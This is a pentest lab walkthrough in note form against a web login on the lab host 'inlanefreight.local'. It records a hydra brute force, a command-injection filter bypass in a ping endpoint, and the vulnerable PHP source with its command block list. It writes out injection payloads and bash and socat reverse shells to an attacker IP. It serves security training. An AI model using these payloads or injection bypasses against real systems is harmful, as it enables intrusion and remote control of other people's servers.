### `www.monitoring.inlanefreight.local` - test login ![[images/Pasted image 20260630085152.png]] ## `monitoring.inlanefreight.local` - another login ![[images/Pasted image 20260628153132.png]] - `admin:admin` doesnt work ![[images/Pasted image 20260630195041.png]] ### SQLi - try SQLi ```bash sqlmap --batch -r monitoring.inlanefreight.local.req ``` ![[images/Pasted image 20260630200257.png]] ### brute force - we know that invalid creds show: "Invalid Cedentials!" - `request:response` in burp ![[images/Pasted image 20260630200657.png]] - view source ![[images/Pasted image 20260630200446.png]] - use `hydra` ```bash hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt monitoring.inlanefreight.local -f http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid Credentials!" ``` - no hits with `rockyou-50.txt` ![[images/Pasted image 20260630202132.png]] - no hits with `/usr/share/seclists/Passwords/Leaked-Databases/rockyou-70.txt` ![[images/Pasted image 20260630203620.png]] - change payload and try some different wordlists - `/usr/share/seclists/Passwords/2023-200_most_used_passwords.txt` - `/usr/share/seclists/Passwords/Common-Credentials/xato-net-10-million-passwords-100000.txt` ```bash hydra -l admin -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt monitoring.inlanefreight.local -f http-post-form "/login.php:username=^USER^&password=^PASS^:F=Invalid Credentials" ``` - we have a hit ![[images/Pasted image 20260630203745.png]] ## restricted shell as `inlanefreight/admin` - logging in with above creds drops me into a GUI-based restricted shell ![[images/Pasted image 20260630204050.png]] - we have access to a few `.txt` files - `help` show what commands we have access to ![[images/Pasted image 20260630204149.png]] - after looking at `main.js` this is not a real CLI just a pseduo LCI in javascript - with some help from gemini we find that the `connection_test` command is executing a `ping` on the backend ![[images/Pasted image 20260630205640.png]] - try to recreate this in browser![[images/Pasted image 20260630210016.png]] - `request:response` in burp ![[images/Pasted image 20260630210237.png]] - unable to change to a POST - garbage input works even without a real ip address ![[images/Pasted image 20260630211426.png]] - `127.0.0.1;` is filtered but `127.0.0.1${LS_COLORS:10:1}` is not - URL encoded new line character works > `%2a` - can run `ls` but not `id` or `pwd` ```bash ip=127.0.0.1%0Als ``` ![[images/Pasted image 20260630213029.png]] - try to `cat` file ```bash ip=127.0.0.1%0Acat${IFS}00112233_flag.txt ``` ## revshell - read `ping.php` and copy+paste into a file ```bash ip=127.0.0.1%0Acat${IFS}ping.php ``` - contents of `ping.php` ```php <?php ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL); $output = ''; function filter($str) { $operators = ['&', '|', ';', '\\', '/', ' ']; foreach ($operators as $operator) { if (strpos($str, $operator)) { return true; } } $words = ['whoami', 'echo', 'rm', 'mv', 'cp', 'id', 'curl', 'wget', 'cd', 'sudo', 'mkdir', 'man', 'history', 'ln', 'grep', 'pwd', 'file', 'find', 'kill', 'ps', 'uname', 'hostname', 'date', 'uptime', 'lsof', 'ifconfig', 'ipconfig', 'ip', 'tail', 'netstat', 'tar', 'apt', 'ssh', 'scp', 'less', 'more', 'awk', 'head', 'sed', 'nc', 'netcat']; foreach ($words as $word) { if (strpos($str, $word) !== false) { return true; } } return false; } if (isset($_GET['ip'])) { $ip = $_GET['ip']; if (filter($ip)) { $output = "Invalid input"; } else { $cmd = "bash -c 'ping -c 1 " . $ip . "'"; $output = shell_exec($cmd); } } ?> <?php echo $output; ?> ``` - `ping.php` filters out common operators and commands - below revshell will be tough based on filtering of & and / ```bash /bin/bash -i >& /dev/tcp/10.10.15.114/9001 0>&1 ``` - base64 the above command then use below ```bash ip=127.0.0.1%0Aexport${IFS}CMD="L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE1LjExNC85MDAxIDA+JjE="$(tr${IFS}'!-}'${IFS}'"-~'<<<:)bash<<<$(base64${IFS}-d<<<$CMD) ``` - issues here ![[images/Pasted image 20260630221929.png]] - check for `socat` on the target ![[images/Pasted image 20260630221910.png]] - create payload ```bash ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:${LS_COLORS:10:1}bin${LS_COLORS:10:1}bash ``` - getting a connection that immediately closes ![[images/Pasted image 20260630222353.png]] - modify payload ```bash ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:bash ``` - we have a hit ![[images/Pasted image 20260630222557.png]] - we can read logs in `/var/log` because we are in the `adm` group